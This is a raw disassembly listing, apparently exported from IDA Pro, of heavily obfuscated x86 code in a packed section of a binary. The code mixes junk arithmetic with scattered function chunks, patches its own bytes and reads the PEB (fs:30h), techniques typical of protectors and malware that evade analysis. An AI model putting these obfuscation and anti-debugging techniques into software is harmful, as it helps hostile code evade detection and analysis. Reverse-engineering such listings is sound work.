; START	OF FUNCTION CHUNK FOR sub_447832

loc_45BA80:				; CODE XREF: sub_447832:loc_43B369j
		add	edi, offset off_44A1A9
		push	offset loc_44A19F
		jmp	loc_454FCB
; END OF FUNCTION CHUNK	FOR sub_447832
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B583

loc_45BA90:				; CODE XREF: sub_45B583:loc_43FD45j
		jz	loc_44A2DA
		jmp	loc_448F75
; END OF FUNCTION CHUNK	FOR sub_45B583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_45BA9B:				; CODE XREF: sub_44D302:loc_445CA7j
		jz	loc_455E4E
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_44DE80
		pop	ecx
		jmp	loc_44901E
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_45BAB0:				; CODE XREF: sub_43ED19:loc_445854j
		jz	loc_4513C9
		jmp	loc_43C9A8
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_45BABB:				; CODE XREF: sub_43EF4F:loc_441F2Bj
		rol	edx, 1
		sbb	ecx, 0FB6D0566h
		sbb	eax, edx
		jmp	loc_446F17
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_45BACA:				; CODE XREF: sub_45689F-1835Fj
					; y2kk37jd:loc_44143Aj
		call	sub_43F67B

loc_45BACF:				; CODE XREF: y2kk37jd:0045A695j
		jmp	loc_446EDA
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45BAD4:				; CODE XREF: sub_445226:loc_43FB18j
		jmp	loc_44333A
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_521. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F0A5

loc_45BADA:				; CODE XREF: sub_43F0A5:loc_44AA7Bj
		jz	loc_442CE5
		jmp	loc_44FA27
; END OF FUNCTION CHUNK	FOR sub_43F0A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_382. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448F60

loc_45BAE6:				; CODE XREF: sub_448F60+10j
		jmp	loc_43BE68
; END OF FUNCTION CHUNK	FOR sub_448F60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_45BAEB:				; CODE XREF: sub_446E19-9C64j
		jmp	loc_440173
; END OF FUNCTION CHUNK	FOR sub_446E19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A3A8

loc_45BAF0:				; CODE XREF: sub_45A3A8:loc_446645j
		pop	eax
		rol	eax, 7
		or	eax, 7939DCB8h
		sub	eax, 14738520h
		or	eax, 0BED58BC4h
		add	eax, 66A355h
		xchg	eax, [esp+0Ch+var_C]
		jmp	sub_4581BB
; END OF FUNCTION CHUNK	FOR sub_45A3A8
; ---------------------------------------------------------------------------
		dd 0CE0FC2F7h, 0FFE9CA33h
		db 93h,	2 dup(0FFh)

; =============== S U B	R O U T	I N E =======================================



sub_45BB1F	proc near		; CODE XREF: sub_410A9C+45p
					; y2kk37jd:00458730j
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0045AC7C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C025 SIZE 00000017 BYTES

		push	eax
		push	0DE7E905Dh
		pop	eax
		sub	eax, 50482E62h
		jmp	loc_45AC7C
sub_45BB1F	endp

; ---------------------------------------------------------------------------
		mov	edx, 0D504D785h
		call	sub_440CD1
		call	sub_458F84
; START	OF FUNCTION CHUNK FOR sub_4551F1

loc_45BB40:				; CODE XREF: sub_4551F1+11j
		jmp	nullsub_400
; END OF FUNCTION CHUNK	FOR sub_4551F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443688

loc_45BB45:				; CODE XREF: sub_443688+10680j
		jmp	nullsub_401
; END OF FUNCTION CHUNK	FOR sub_443688
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_242. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F45

loc_45BB4B:				; CODE XREF: sub_455F45+5j
		jmp	loc_452695
; END OF FUNCTION CHUNK	FOR sub_455F45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444899

loc_45BB50:				; CODE XREF: sub_444899-41FCj
		jmp	loc_43BBCF
; END OF FUNCTION CHUNK	FOR sub_444899
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447FB4

loc_45BB55:				; CODE XREF: sub_447FB4+14j
		add	edx, 0A4A33B7Bh
		xor	esi, edx

loc_45BB5D:				; CODE XREF: sub_447FB4+Dj
		and	esi, 909795h
		add	esi, 0FFB1DE17h
		mov	[esi], eax
		pop	esi
		lea	eax, sub_442F52
		jmp	loc_44D9C1
; END OF FUNCTION CHUNK	FOR sub_447FB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_45BB77:				; CODE XREF: sub_449C4F-EA33j
		jl	loc_45BF95

loc_45BB7D:				; CODE XREF: y2kk37jd:00440799j
		jmp	loc_43F8DF
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
		jnz	loc_450FDF
		sbb	ebx, ecx
		jmp	loc_45BF95
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7BF

loc_45BB8F:				; CODE XREF: sub_43C7BF+Ej
					; sub_4458DD:loc_45ABF6j
		push	offset sub_4567C1

loc_45BB94:				; CODE XREF: sub_444825:loc_440D09j
		jmp	nullsub_402
; END OF FUNCTION CHUNK	FOR sub_43C7BF

; =============== S U B	R O U T	I N E =======================================



sub_45BB99	proc near		; CODE XREF: y2kk37jd:0043E7EDj
					; sub_45C104-1D8B4p

; FUNCTION CHUNK AT 0044D64A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F9B SIZE 00000017 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	edx, ebx
		rol	edx, 5
		xor	edx, ecx
		rol	edx, 5
		add	edx, eax
		jmp	loc_452F9B
sub_45BB99	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44918E

loc_45BBAE:				; CODE XREF: sub_44918E+7j
		pop	edi
		sub	edi, 0EA56AD8h
		or	edi, 0FBCC7C48h
		add	edi, 47795ACh
		jmp	loc_44AB17
; END OF FUNCTION CHUNK	FOR sub_44918E
; ---------------------------------------------------------------------------

loc_45BBC6:				; CODE XREF: y2kk37jd:0044CEEAj
		jnz	loc_44D3CB
		adc	ebp, 873F467Ch
; START	OF FUNCTION CHUNK FOR sub_458FCE

loc_45BBD2:				; CODE XREF: sub_458FCE:loc_44CEDBj
		rol	eax, 8
		sub	eax, 0AF5D37E6h
		add	eax, 1234D8A5h
		add	eax, ebp
		call	sub_43ED19
; END OF FUNCTION CHUNK	FOR sub_458FCE
; START	OF FUNCTION CHUNK FOR sub_4427F5

loc_45BBE8:				; CODE XREF: sub_4427F5+5j
		jmp	ds:off_41E028
; END OF FUNCTION CHUNK	FOR sub_4427F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454187

loc_45BBEE:				; CODE XREF: sub_454187+5j
		jmp	loc_4462E0
; END OF FUNCTION CHUNK	FOR sub_454187
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E35F

loc_45BBF3:				; CODE XREF: sub_44E35F+7j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_44E35F

; =============== S U B	R O U T	I N E =======================================



sub_45BBF8	proc near		; CODE XREF: sub_4427F5p
					; sub_448306:loc_4519E9j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D66C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044103C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00444E08 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004455C2 SIZE 00000008 BYTES

		jnz	loc_4455C2
		pop	edx
		mov	eax, [esp+0]
		jmp	loc_44103C
sub_45BBF8	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45BC07	proc near		; DATA XREF: sub_44F44F-F6B4o

; FUNCTION CHUNK AT 0043B9EE SIZE 0000000C BYTES

		call	sub_4436E7
		call	sub_44CF38
		test	ebp, 7A7EBB54h
		jmp	loc_43B9EE
sub_45BC07	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_45BC1C:				; CODE XREF: sub_44AAA1:loc_45629Dj
		cmp	dword ptr [ebp-10h], 0
		jnz	loc_44E4C8
		mov	eax, [ebp+8]
		push	offset loc_43B22C
		jmp	nullsub_404
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413E3

loc_45BC33:				; CODE XREF: sub_4413E3+Aj
		pop	edx
		adc	ebp, 21132B5h
		jmp	loc_44E097
; END OF FUNCTION CHUNK	FOR sub_4413E3

; =============== S U B	R O U T	I N E =======================================



sub_45BC3F	proc near		; CODE XREF: sub_455AA9j
					; DATA XREF: sub_4448E2:loc_455A9Fo

; FUNCTION CHUNK AT 00448912 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004589DA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045AFBC SIZE 00000005 BYTES

		cmp	dword ptr [ebp-4], 5
		jnz	loc_43CF5D
		jmp	loc_448912
sub_45BC3F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44201B

loc_45BC4E:				; CODE XREF: sub_44201B:loc_455499j
		jz	loc_449451
; END OF FUNCTION CHUNK	FOR sub_44201B
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_45BC54:				; CODE XREF: sub_43EF4F+BADBj
		jmp	loc_451EC9
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
		db 0Fh,	82h, 2Eh
		dd 0E9000004h, 0FFFED7E5h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_45BC64:				; CODE XREF: sub_44DED9:loc_44DA50j
		test	al, al
		jz	loc_441400
		jmp	loc_4522AD
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B6E8

loc_45BC71:				; CODE XREF: sub_44B6E8+12j
		and	ecx, 1AD23729h
		sub	ecx, ds:4000EDh
		rol	ecx, 18h
		test	ecx, 100000h
		jmp	loc_4507E6
; END OF FUNCTION CHUNK	FOR sub_44B6E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_45BC8B:				; CODE XREF: sub_45B7AA:loc_45B81Ej
		jz	loc_4542E9
		jmp	loc_43E85F
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_45BC96:				; CODE XREF: sub_4411C3+104BAj
		sbb	edx, 0BC34C5CDh
		xor	edx, 909C2694h
; END OF FUNCTION CHUNK	FOR sub_4411C3
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_45BCA2:				; CODE XREF: sub_45689F-1AD71j
		sub	ebx, 0AF300153h
		add	ebx, 0F0E06CABh
		jmp	loc_4554D8
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_45BCB3:				; CODE XREF: y2kk37jd:0044A189j
		add	edi, 8B874483h
		xchg	edi, [esp]
		jmp	loc_445F46
; ---------------------------------------------------------------------------

loc_45BCC1:				; DATA XREF: y2kk37jd:00455B9Co
		xchg	edi, [esp]
		jmp	loc_444688
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4587AA

loc_45BCC9:				; CODE XREF: sub_4587AA-3525j
		add	edi, 0E1557E7h
		test	esi, 339F00F2h
		jmp	loc_44F054
; END OF FUNCTION CHUNK	FOR sub_4587AA
; ---------------------------------------------------------------------------

loc_45BCDA:				; CODE XREF: y2kk37jd:0043B52Cj
		jns	loc_44B2F3

loc_45BCE0:				; CODE XREF: y2kk37jd:loc_455E38j
		push	edi
		push	0A5EB4143h
		pop	edi
		xor	edi, 1E32897Dh
		or	edi, 1D4DE886h
		jmp	loc_454F4D
; ---------------------------------------------------------------------------

loc_45BCF8:				; CODE XREF: y2kk37jd:00451E58j
		mov	[edx], esi
		pushf

loc_45BCFB:				; CODE XREF: y2kk37jd:loc_45250Ej
		push	esi
		push	64FFC339h
		pop	esi
		xor	esi, 0EE5E95CBh
		test	esi, 10000000h
		jmp	loc_44800E
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 1Ch
		mov	ds:dword_445850, eax
		jmp	loc_44FB41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447832

loc_45BD22:				; CODE XREF: sub_447832j
		push	offset sub_451464
		jmp	loc_44C0A1
; END OF FUNCTION CHUNK	FOR sub_447832
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4412BF

loc_45BD2C:				; CODE XREF: sub_4412BF+19j
		pop	ebx
		and	eax, 65BB314Fh
		rol	eax, 4
		sub	eax, 98CF11CDh
		jmp	loc_440625
; END OF FUNCTION CHUNK	FOR sub_4412BF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_333. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45BD42:				; CODE XREF: sub_445226-5858j
		jmp	loc_456866
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D627

loc_45BD47:				; CODE XREF: sub_44D627:loc_4564A8j
		sub	esi, 0B70DFF3h
		test	ebx, ecx

loc_45BD4F:				; CODE XREF: y2kk37jd:00454879j
		jmp	loc_44645A
; END OF FUNCTION CHUNK	FOR sub_44D627
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_45BD54:				; CODE XREF: sub_44753E-B1ADj
		jb	loc_43BC20
		jmp	loc_449F25
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45BD5F:				; CODE XREF: sub_445226:loc_44536Ej
		call	sub_45B135

loc_45BD64:				; CODE XREF: sub_450216+1Dj
		jmp	loc_43E30B
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_45BD69:				; CODE XREF: sub_45136B-6690j
		jmp	loc_457170
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------

loc_45BD6E:				; CODE XREF: y2kk37jd:loc_44F32Fj
		mov	ds:dword_4516E8, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442ED1

loc_45BD75:				; CODE XREF: sub_442ED1+17j
		jmp	loc_43FF5A
; END OF FUNCTION CHUNK	FOR sub_442ED1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_45BD7A:				; CODE XREF: sub_4411C3+BB45j
		rol	eax, 4
		push	eax

loc_45BD7E:				; CODE XREF: y2kk37jd:00457BEEj
		jmp	nullsub_409
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------

loc_45BD83:				; CODE XREF: y2kk37jd:004545ACj
		jbe	loc_43F1E5

loc_45BD89:				; CODE XREF: y2kk37jd:loc_458BA8j
		rol	edx, 1Ch
		xor	edx, 435C36E8h
		add	edx, 0D181120Ch
		call	sub_44355A
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_45BD9D:				; CODE XREF: sub_43F75D+CFC3j
		jmp	loc_44A90D
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468E0

loc_45BDA2:				; CODE XREF: sub_4468E0:loc_453681j
		jnz	loc_45A12E

loc_45BDA8:				; CODE XREF: sub_4458DD+12810j
		jmp	loc_44E8D3
; END OF FUNCTION CHUNK	FOR sub_4468E0
; ---------------------------------------------------------------------------

loc_45BDAD:				; CODE XREF: y2kk37jd:00450A4Ej
		jmp	loc_447D2B
; ---------------------------------------------------------------------------
		sbb	edi, ebp
		or	ebx, 86F28AA4h
		sbb	eax, 3678E552h
		jmp	loc_45A12C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB32

loc_45BDC5:				; CODE XREF: sub_44DB32+9j
		push	ecx
		mov	esp, ebp
		push	offset sub_4465C3
		jmp	loc_458426
; END OF FUNCTION CHUNK	FOR sub_44DB32
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_45BDD2:				; CODE XREF: sub_455B08-24C8j
		push	offset sub_445CC9
		jmp	nullsub_410
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_45BDDC:				; CODE XREF: y2kk37jd:004406E7j
					; sub_445787:loc_452FECj
		jg	loc_447EEE
		not	esi
		mov	ebp, [edx]
		adc	ecx, 82B38E66h
; END OF FUNCTION CHUNK	FOR sub_445787
; START	OF FUNCTION CHUNK FOR sub_449734

loc_45BDEC:				; CODE XREF: sub_449734:loc_454F99j
		sub	ebx, 0B3352770h
		jmp	loc_4470B0
; END OF FUNCTION CHUNK	FOR sub_449734
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448797

loc_45BDF7:				; CODE XREF: sub_448797+10j
		jz	loc_4565B3
		jmp	loc_4477EF
; END OF FUNCTION CHUNK	FOR sub_448797
; ---------------------------------------------------------------------------
		jle	loc_43B2A0
		jmp	loc_45A88B

; =============== S U B	R O U T	I N E =======================================



sub_45BE0D	proc near		; CODE XREF: sub_43BA66+1D7Bp
					; y2kk37jd:0044AA66j

; FUNCTION CHUNK AT 0044F8A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045152B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004585F2 SIZE 0000000E BYTES

		xchg	edi, [esp+0]
		pop	edi
		call	sub_44C5E9
		mov	edx, 0E5254649h
		call	sub_455DD8
		mov	ds:dword_4470C4, eax
		jmp	loc_44F8A8
sub_45BE0D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_45BE2A:				; CODE XREF: sub_43BA66:loc_43D7CEj
		cmp	ds:dword_4470C4, 0
		jnz	loc_43F483
		jmp	loc_4585DE
; END OF FUNCTION CHUNK	FOR sub_43BA66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_45BE3C:				; CODE XREF: sub_4429DD:loc_457352j
		push	edx
		call	sub_459F8F
		mov	eax, 0CE14EFFFh
		call	sub_44113A
		push	esi
		push	793B1F34h
		jmp	loc_44188D
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
		mov	eax, 0F2B89A19h
		call	sub_442C3E
		mov	ds:off_41E090, eax
		lea	eax, sub_4443CD
		mov	byte ptr [eax],	0C3h
		jmp	sub_4443CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443CD

loc_45BE75:				; CODE XREF: sub_4443CD+6j
		mov	eax, [esp-4+arg_0]
		jmp	loc_446242
; END OF FUNCTION CHUNK	FOR sub_4443CD

; =============== S U B	R O U T	I N E =======================================



sub_45BE7D	proc near		; CODE XREF: y2kk37jd:0044A2C5j
					; sub_43C851+1CF95p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044E613 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xchg	edx, [esp-4+arg_0]

loc_45BE84:				; CODE XREF: sub_4448E2:loc_43EBF9j
		jmp	loc_44E613
sub_45BE7D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_45BE89:				; CODE XREF: y2kk37jd:0044AA45j
					; sub_453867:loc_450DE9j
		or	edx, 0CF74237Ah
		push	offset sub_44BAB3
		jmp	loc_444599
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_45BE99:				; CODE XREF: sub_44B0D0:loc_450FD5j
		jno	loc_43CBA0
		sub	al, 99h
		push	451622B5h
		pop	edx
		rol	edx, 1Fh
		test	edx, 20h
		jmp	loc_43FAB7
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D2A

loc_45BEB5:				; CODE XREF: sub_440D2A+8j
		rol	ecx, 1Fh
		xor	ecx, 9C7BC462h
		popf
		call	sub_45C5CF
; END OF FUNCTION CHUNK	FOR sub_440D2A

; =============== S U B	R O U T	I N E =======================================



sub_45BEC4	proc near		; CODE XREF: y2kk37jd:0044E75Dj
					; sub_445787:loc_45675Cp

; FUNCTION CHUNK AT 0045241B SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		pop	edx
		push	offset sub_453A10
		jmp	loc_45241B
sub_45BEC4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450857

loc_45BED3:				; CODE XREF: sub_450857:loc_452952j
		sub	ebx, 0C74A4FE8h
		xor	ebx, 0D2EDA674h
		popf
		sub	eax, ebx
		pop	ebx
		jmp	loc_446474
; END OF FUNCTION CHUNK	FOR sub_450857
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_45BEE8:				; CODE XREF: sub_43F346j
		push	0BB4E3DB0h
		xchg	esi, [esp+0]
		jmp	loc_43EC7F
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_45BEF5:				; CODE XREF: sub_45B7AA:loc_4428C0j
		call	sub_459318

loc_45BEFA:				; CODE XREF: y2kk37jd:0045A3A3j
		jmp	nullsub_526
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445D0C

loc_45BEFF:				; CODE XREF: sub_445D0C+11E09j
		jmp	nullsub_419
; END OF FUNCTION CHUNK	FOR sub_445D0C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_45BF04:				; CODE XREF: sub_459789:loc_446C82j
		jmp	loc_45467C
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------

loc_45BF09:				; CODE XREF: y2kk37jd:004439A7j
		jmp	loc_453755
; ---------------------------------------------------------------------------
		shl	ecx, 8
		jmp	sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_45BF16:				; CODE XREF: sub_4507BF-A1BDj
		jp	loc_45121D
		push	edi
		sbb	ebp, 118E9613h
		jmp	loc_447280
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_45BF28:				; CODE XREF: y2kk37jd:0043CE05j
		jo	loc_453515
		xor	ebx, edi
		jmp	sub_45922C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_45BF35:				; CODE XREF: sub_45447D-17236j
					; sub_45447D-1722Dj ...
		jb	loc_455A9F
		cmp	[ebp+var_4], 5
		jnz	loc_43CF5D
		jmp	loc_453208
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_45BF4A:				; CODE XREF: y2kk37jd:0044098Bj
		xchg	edx, [esp]
		mov	edi, edx
		pop	edx
		lea	eax, loc_43FE46
		mov	byte ptr [eax],	0C3h
		jmp	loc_443C48

; =============== S U B	R O U T	I N E =======================================



sub_45BF5E	proc near		; CODE XREF: sub_40F60F+8Cp
					; sub_43DE8B+3D10j ...
		call	sub_446B6E
		jmp	ds:off_41E0B4
sub_45BF5E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_45BF69:				; CODE XREF: sub_44107E+5j
		jmp	loc_455D09
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------

loc_45BF6E:				; CODE XREF: y2kk37jd:00448E58j
		and	edx, 0DDCF8D87h
		test	edx, 4
		jmp	loc_4571C4
; ---------------------------------------------------------------------------

loc_45BF7F:				; CODE XREF: y2kk37jd:loc_45069Dj
		push	offset sub_445AD9
		jmp	loc_44F54F
; ---------------------------------------------------------------------------
		mov	eax, large fs:30h
		call	sub_44362C
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_45BF95:				; CODE XREF: sub_449C4F:loc_45BB77j
					; y2kk37jd:0045BB8Aj
		xor	eax, 95902F53h
		call	sub_444773

loc_45BFA0:				; CODE XREF: y2kk37jd:0045C592j
		jmp	loc_456388
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554A3

loc_45BFA5:				; CODE XREF: sub_4554A3-1705Cj
		jmp	loc_446201
; END OF FUNCTION CHUNK	FOR sub_4554A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_45BFAA:				; CODE XREF: sub_43C7B9+F9ADj
		jz	loc_45720B
		jmp	loc_45C133
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_45BFB5:				; CODE XREF: sub_454D0F+1j
		mov	esi, ebp
		xchg	esi, [esp+0]
		call	sub_44B0D0

loc_45BFBF:				; CODE XREF: sub_44346B-6611j
		jge	loc_43BC90

loc_45BFC5:				; CODE XREF: sub_44C2AE+6742j
		jmp	loc_457508
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
		ror	edx, 1Ah
		jmp	loc_43BC8D
; ---------------------------------------------------------------------------

loc_45BFD2:				; CODE XREF: y2kk37jd:0045788Cj
		adc	edi, esi
		pop	ecx
		or	ecx, edi
		xor	edi, 39B6574h
		jmp	loc_4428E2
; ---------------------------------------------------------------------------
		mov	eax, 8D800AAh
		call	sub_442C3E
		push	esi
		mov	esi, edx
		xchg	esi, [esp]
		push	2363C3E8h
		pop	edx
		jmp	loc_44B30D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A57D

loc_45BFFD:				; CODE XREF: sub_44A57D:loc_43B995j
		xor	ecx, 0F832BC3Ch
		add	ecx, 0F9C09D6Dh
		mov	[ecx], eax
		pop	ecx
		lea	eax, sub_448DCA
		mov	byte ptr [eax],	0C3h
		jmp	sub_448DCA
; END OF FUNCTION CHUNK	FOR sub_44A57D

; =============== S U B	R O U T	I N E =======================================



sub_45C01A	proc near		; CODE XREF: sub_40D41A:loc_40D553p
					; sub_445226+2D7j
					; DATA XREF: ...

; FUNCTION CHUNK AT 004424C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446849 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004566BA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045A01A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045A33D SIZE 00000005 BYTES

		push	eax
		push	41D289FEh
		jmp	loc_45A33D
sub_45C01A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BB1F

loc_45C025:				; CODE XREF: sub_45BB1F:loc_45AC7Cj
		rol	eax, 0Ch
		and	eax, 5BA5CA7Dh
		add	eax, 0BE3FFECFh
		xchg	eax, [esp+4+var_4]
		jmp	loc_458736
; END OF FUNCTION CHUNK	FOR sub_45BB1F

; =============== S U B	R O U T	I N E =======================================



sub_45C03C	proc near		; DATA XREF: y2kk37jd:00445601o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440557 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004430D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444C03 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044D18F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004564C3 SIZE 00000005 BYTES

		push	edx
		call	sub_447041
		mov	eax, 147A4491h
		push	ecx
		push	59C2799h
		jmp	loc_44D18F
sub_45C03C	endp

; ---------------------------------------------------------------------------

loc_45C052:				; CODE XREF: y2kk37jd:loc_44F4FCj
		add	ecx, 53BFD62Dh
		not	ebp
		jmp	loc_455AC4
; ---------------------------------------------------------------------------
		mov	ds:off_41E198, eax
		push	offset sub_4509C6
		jmp	locret_43B68A
; ---------------------------------------------------------------------------
		push	esi
		mov	esi, eax
		push	offset sub_44A326
		jmp	loc_451C1C
; ---------------------------------------------------------------------------

locret_45C07C:				; CODE XREF: y2kk37jd:0044E1ECj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44803E

loc_45C07D:				; CODE XREF: sub_44803E+Ej
		jmp	loc_45AC16
; END OF FUNCTION CHUNK	FOR sub_44803E
